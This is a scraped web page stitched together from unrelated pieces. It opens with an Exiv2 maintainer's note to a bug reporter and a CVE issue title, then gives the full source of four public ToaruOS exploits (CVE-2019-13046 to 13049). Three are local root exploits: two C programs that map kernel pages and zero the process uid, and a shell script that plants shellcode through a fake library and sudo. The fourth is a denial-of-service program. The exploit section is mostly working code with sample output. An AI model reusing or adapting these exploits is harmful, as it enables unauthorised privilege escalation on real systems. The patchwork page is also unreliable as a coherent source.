Are you willing to work with Team Exiv2 to fix some of this stuff. Let me explain our situation:

We're a small group of volunteers (6 regulars). We are currently refactoring a lot of the code in C++11 for v0.28 and hope to complete that work in 2020. When that's in progress, we'll have quarterly "dot" releases of v0.27 with security and important bug fixes.

The guys doing the refactoring have to "break out" from their project to deal with those security fixes and they have to implemented for both v0.27 and v0.28.

Many of those security issues are small changes to the code (testing for integer overflow or testing null-pointers). If you'd be willing to get involved with the project and report _**both**_ the fix and the issue, life would be less stressful for us.

Perhaps you could share your thoughts with us. You've reported 4 issues today. Is this the first of 40, or the last of 4?

Please understand that we appreciate you taking the time to find and report issues. However please understand that we are a small team and you can overwhelm us with your enthusiasm!

Team Exiv2 use "Slack" to talk to each other directly. If you send me your email address, I will invite you to join us. My email is robin@clanmills.com

CVE-2019-13114: null pointer dereference in http.cpp · Issue #793 · Exiv2/exiv2

kernel/sys/syscall.c in ToaruOS through 1.10.9 has incorrect access control in sys_sysfunc case 9 for TOARU_SYS_FUNC_SETHEAP, allowing arbitrary kernel pages to be mapped into user land, leading to root access.

/\* \* The Mickey Mouse Hacking Squadron proudly presents \* \* CVE-2019-13047 \* \* ToaruOS 1.10.9 sysfunc local kernel exploit \* \* .-"""-. \* / . - \\ \* \\ / \* .-""-.,:.-\_-.< \* / \_; , / ).| \* \\ ; / \` \`" '\\ \* '.-| ;-.\_\_\_\_, | ., \* \\ \`.\_~\_/ / /"/ \* ,. /\`-.\_\_.-'\\\`-.\_ ,",' ; \* \\"\\ / /| o \\.\_ \`-.\_; / ./-. \* ; ';, / / | \`\_\_ \\ \`-.,( / //.-' \* :\\ \\\\;\_.-" ; |.-"\` \`\`\\ /-. /.-' \* :\\ .\\),.-' / }{ | '..' \* \\ .-\\ | , / \* '..' ;' , / \* ( \_\_ \`;--;'\_\_\`) \* \`//'\` \`||\` \* \_// || \* .-"-.\_,(\_\_) .(\_\_).-""-. \* / \\ / \\ \* \\ / \\ / \* \`'--=="--\` \`--""==--'\` \* \* local@livecd ~$ gcc -Wall kowasu-sysfunc.c -o kowasu-sysfunc \* local@livecd ~$ whoami \* local \* local@livecd ~$ ./kowasu-sysfunc \* \[ \] Scanning for 'current\_process' symbol... \* symbol: 00122804 \* current\_process: 0184a010 \* \[ \] Sanity checking 'process\_t' structure... \* getpid(): 206 \* current\_process->id: 206 \* \[ \] Spawning self-righteous root shell... \* 0@livecd /home/local# whoami \* root \*/ #include <stdio.h\> #include <stdint.h\> #include <stdlib.h\> #include <unistd.h\> #include <sys/sysfunc.h\> #define KERNEL\_SCAN\_START (1024U \* 1024U) #define KERNEL\_SCAN\_END (1024U \* 2048U) /\* Partial process structure specifying the members we need. \*/ struct process { pid\_t id; char \* name; char \* description; unsigned int user; unsigned int real\_user; }; void \*memmem(const void \*haystack, size\_t haystacklen, const void \*needle, size\_t needlelen) { const unsigned char \*p = haystack; const unsigned char \*end = p + haystacklen - needlelen + 1; for (; p < end; p++) { size\_t i; for (i = 0; i < needlelen; i++) if (p\[i\] != ((unsigned char \*)needle)\[i\]) break; if (i == needlelen) return (void \*)p; } return NULL; } void map\_page(void \*address) { char \*args\[\] = { address }; static void \*brk = NULL; /\* Keep track of the original break, as we need to restore \* proc->image.heap and proc->image.heap\_actual to ensure malloc() \* will not use sbrk() and serve kernel pages back to libc. \*/ if (brk == NULL) brk = sbrk(4096); if (sysfunc(TOARU\_SYS\_FUNC\_SETHEAP, args) < 0) { perror("sysfunc()"); exit(EXIT\_FAILURE); } /\* Restore the original break. \*/ args\[0\] = brk; if (sysfunc(TOARU\_SYS\_FUNC\_SETHEAP, args) < 0) { /\* If we fail, do not print, as it could malloc(). \*/ \_exit(EXIT\_FAILURE); } } void spawn\_shell(void) { char \* const arg\[2\] = { "sh", NULL }; execve("/bin/sh", arg, NULL); perror("execve()"); exit(EXIT\_FAILURE); } int main(void) { struct process \*current\_process; uintptr\_t addr; pid\_t pid; pid = getpid(); printf("\[ \] Scanning for 'current\_process' symbol...\\n"); for (addr = KERNEL\_SCAN\_START; addr < KERNEL\_SCAN\_END; addr += 4096) { void \*p = (void \*)addr; map\_page(p); if ( (p = memmem(p, 4096, "current\_process", 16))) { current\_process = \*((void \*\*)p - 1); break; } } if (addr >= KERNEL\_SCAN\_END) { printf(" not found...\\n"); exit(EXIT\_FAILURE); } printf(" symbol: %p\\n", current\_process); map\_page(current\_process); current\_process = \*((void \*\*)current\_process); printf(" current\_process: %p\\n", current\_process); printf("\[ \] Sanity checking 'process\_t' structure...\\n"); printf(" getpid(): %d\\n", pid); printf(" current\_process->id: %d\\n", current\_process->id); if (pid != current\_process->id) { printf(" mismatching PID, exiting...\\n"); exit(EXIT\_FAILURE); } printf("\[ \] Spawning self-righteous root shell...\\n"); current\_process->user = 0; current\_process->real\_user = 0; spawn\_shell(); }

CVE-2019-13047: kowasuos/kowasu-sysfunc.c at master · mehsauce/kowasuos

An integer wrap in kernel/sys/syscall.c in ToaruOS 1.10.10 allows users to map arbitrary kernel pages into userland process space via TOARU_SYS_FUNC_MMAP, leading to escalation of privileges.

/\* \* The Mickey Mouse Hacking Squadron proudly presents \* \* CVE-2019-13049 \* \* ToaruOS 1.10.10 sysfunc local kernel exploit \* \* PART II: THE REVENGE \* Starring \* \* Kay 'Integer Wrap' Lange \* Mickey Mouse \* \* \* .-"""-. \* / . - \\ \* \\ / \* .-""-.,:.-\_-.< \* / \_; , / ).| \* \\ ; / \` \`" '\\ \* '.-| ;-.\_\_\_\_, | ., \* \\ \`.\_~\_/ / /"/ \* ,. /\`-.\_\_.-'\\\`-.\_ ,",' ; \* \\"\\ / /| o \\.\_ \`-.\_; / ./-. \* ; ';, / / | \`\_\_ \\ \`-.,( / //.-' \* :\\ \\\\;\_.-" ; |.-"\` \`\`\\ /-. /.-' \* :\\ .\\),.-' / }{ | '..' \* \\ .-\\ | , / \* '..' ;' , / \* ( \_\_ \`;--;'\_\_\`) \* \`//'\` \`||\` \* \_// || \* .-"-.\_,(\_\_) .(\_\_).-""-. \* / \\ / \\ \* \\ / \\ / \* \`'--=="--\` \`--""==--'\` \* \* local@livecd ~$ gcc -Wall kowasu-sysfunc-revenge.c -o kowasu-sysfunc-revenge \* local@livecd ~$ whoami \* local \* local@livecd ~$ ./kowasu-sysfunc-revenge \* \[ \] Scanning for 'current\_process' symbol... \* symbol: 00122844 \* current\_process: 0186b010 \* \[ \] Sanity checking 'process\_t' structure... \* getpid(): 103 \* current\_process->id: 103 \* \[ \] Spawning self-righteous root shell... \* 0@livecd /home/local# whoami \* root \*/ #include <stdio.h\> #include <stdint.h\> #include <stdlib.h\> #include <unistd.h\> #include <sys/sysfunc.h\> #define KERNEL\_SCAN\_START (1024U \* 1024U) #define KERNEL\_SCAN\_END (1024U \* 2048U) /\* Partial process structure specifying the members we need. \*/ struct process { pid\_t id; char \* name; char \* description; unsigned int user; unsigned int real\_user; }; void \*memmem(const void \*haystack, size\_t haystacklen, const void \*needle, size\_t needlelen) { const unsigned char \*p = haystack; const unsigned char \*end = p + haystacklen - needlelen + 1; for (; p < end; p++) { size\_t i; for (i = 0; i < needlelen; i++) if (p\[i\] != ((unsigned char \*)needle)\[i\]) break; if (i == needlelen) return (void \*)p; } return NULL; } void map\_pages(void) { char \*args\[\] = { (char \*)0xFFFFF000, (char \*)0x20001000 }; if (sysfunc(TOARU\_SYS\_FUNC\_MMAP, args) < 0) { perror("sysfunc()"); exit(EXIT\_FAILURE); } } void spawn\_shell(void) { char \* const arg\[2\] = { "sh", NULL }; execve("/bin/sh", arg, NULL); perror("execve()"); exit(EXIT\_FAILURE); } int main(void) { struct process \*current\_process; uintptr\_t addr; pid\_t pid; pid = getpid(); map\_pages(); printf("\[ \] Scanning for 'current\_process' symbol...\\n"); for (addr = KERNEL\_SCAN\_START; addr < KERNEL\_SCAN\_END; addr += 4096) { void \*p = (void \*)addr; if ( (p = memmem(p, 4096, "current\_process", 16))) { current\_process = \*((void \*\*)p - 1); break; } } if (addr >= KERNEL\_SCAN\_END) { printf(" not found...\\n"); exit(EXIT\_FAILURE); } printf(" symbol: %p\\n", current\_process); current\_process = \*((void \*\*)current\_process); printf(" current\_process: %p\\n", current\_process); printf("\[ \] Sanity checking 'process\_t' structure...\\n"); printf(" getpid(): %d\\n", pid); printf(" current\_process->id: %d\\n", current\_process->id); if (pid != current\_process->id) { printf(" mismatching PID, exiting...\\n"); exit(EXIT\_FAILURE); } printf("\[ \] Spawning self-righteous root shell...\\n"); current\_process->user = 0; current\_process->real\_user = 0; spawn\_shell(); }

CVE-2019-13049: kowasuos/kowasu-sysfunc-revenge.c at master · mehsauce/kowasuos

kernel/sys/syscall.c in ToaruOS through 1.10.9 allows a denial of service upon a critical error in certain sys_sbrk allocation patterns (involving PAGE_SIZE, and a value less than PAGE_SIZE).

/\*

\* The Mickey Mouse Hacking Squadron proudly presents

\*

\* CVE-2019-13048

\*

\* ToaruOS 1.10.9 sbrk local denial of service

\*

\* .-"""-.

\* / . - \\

\* \\ /

\* .-""-.,:.-\_-.<

\* / \_; , / ).|

\* \\ ; / \` \`" '\\

\* '.-| ;-.\_\_\_\_, | .,

\* \\ \`.\_~\_/ / /"/

\* ,. /\`-.\_\_.-'\\\`-.\_ ,",' ;

\* \\"\\ / /| o \\.\_ \`-.\_; / ./-.

\* ; ';, / / | \`\_\_ \\ \`-.,( / //.-'

\* :\\ \\\\;\_.-" ; |.-"\` \`\`\\ /-. /.-'

\* :\\ .\\),.-' / }{ | '..'

\* \\ .-\\ | , /

\* '..' ;' , /

\* ( \_\_ \`;--;'\_\_\`)

\* \`//'\` \`||\`

\* \_// ||

\* .-"-.\_,(\_\_) .(\_\_).-""-.

\* / \\ / \\

\* \\ / \\ /

\* \`'--=="--\` \`--""==--'\`

\*

\* local@livecd ~$ gcc kowasu-sbrk.c -o kowasu-sbrk

\* local@livecd ~$ whoami

\* local

\* local@livecd ~$ ./kowasu-sbrk

\* \[0000000294.562:kernel/mem/mem.c:200\] CRITICAL: System claims to be out of

\* usable memory, which means we

\* probably overwrote the page frames.

\*/

#include <stdio.h\>

#include <stdint.h\>

#include <unistd.h\>

#define PAGE\_SIZE 4096

int main(void)

{

uintptr\_t p;

printf("\[ \] Triggering sbrk wrap denial of service...\\n");

do {

p = (uintptr\_t)sbrk(PAGE\_SIZE);

if (p % 0x10000000 == 0)

printf(" %p\\n", p);

/\* The last page needs to make ensure that we wrap

\* image.heap\_actual first.

\* We can do this by requesting < PAGE\_SIZE once, and this

\* will overwrite the page frames, causing a critical.

\*

\* Doesn't seem like we can control/stop this and exploit.

\*/

if (p == 0xFFFFE000) {

p = (uintptr\_t)sbrk(42);

break;

}

} while (1);

}

CVE-2019-13048: kowasuos/kowasu-sbrk.c at master · mehsauce/kowasuos

linker/linker.c in ToaruOS through 1.10.9 has insecure LD_LIBRARY_PATH handling in setuid applications.

Permalink

Cannot retrieve contributors at this time

#!/bin/sh

#

# The Mickey Mouse Hacking Squadron proudly presents

#

# CVE-2019-13046

#

# ToaruOS 1.10.9 sudo/linker local root exploit

#

# .-"""-.

# / . - \\

# \\ /

# .-""-.,:.-\_-.<

# / \_; , / ).|

# \\ ; / \` \`" '\\

# '.-| ;-.\_\_\_\_, | .,

# \\ \`.\_~\_/ / /"/

# ,. /\`-.\_\_.-'\\\`-.\_ ,",' ;

# \\"\\ / /| o \\.\_ \`-.\_; / ./-.

# ; ';, / / | \`\_\_ \\ \`-.,( / //.-'

# :\\ \\\\;\_.-" ; |.-"\` \`\`\\ /-. /.-'

# :\\ .\\),.-' / }{ | '..'

# \\ .-\\ | , /

# '..' ;' , /

# ( \_\_ \`;--;'\_\_\`)

# \`//'\` \`||\`

# \_// ||

# .-"-.\_,(\_\_) .(\_\_).-""-.

# / \\ / \\

# \\ / \\ /

# \`'--=="--\` \`--""==--'\`

#

# local@livecd ~$ whoami

# local

# local@livecd ~$ ./kowasu-linker.sh

# 0@livecd /home/local# whoami

# root

# We use shellcode because we replaced libc and this keeps things simple.

echo "unsigned char shellcode\[\] = {" \> /tmp/x.c

echo " 0x31, 0xc0, 0x04, 0x18, 0x31, 0xdb, 0xcd, 0x7f, 0xeb, 0x1a, 0x5b, 0x31," \>> /tmp/x.c

echo " 0xc0, 0x88, 0x43, 0x07, 0x89, 0x5b, 0x08, 0x89, 0x43, 0x0c, 0x04, 0x07," \>> /tmp/x.c

echo " 0x8d, 0x4b, 0x08, 0x8d, 0x53, 0x0c, 0xcd, 0x7f, 0x31, 0xc0, 0xcd, 0x7f," \>> /tmp/x.c

echo " 0xe8, 0xe1, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68," \>> /tmp/x.c

echo " 0x68, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58" \>> /tmp/x.c

echo "};" \>> /tmp/x.c

echo "\_\_attribute\_\_((constructor)) void mehness(void)" \>> /tmp/x.c

echo "{" \>> /tmp/x.c

echo " ((void (\*)(void))shellcode)();" \>> /tmp/x.c

echo "}" \>> /tmp/x.c

gcc -fPIC -shared /tmp/x.c -o /tmp/libc.so

rm /tmp/x.c

cp /tmp/libc.so /tmp/libtoaru\_auth.so

LD\_LIBRARY\_PATH=/tmp

sudo mehness

Tag

#c++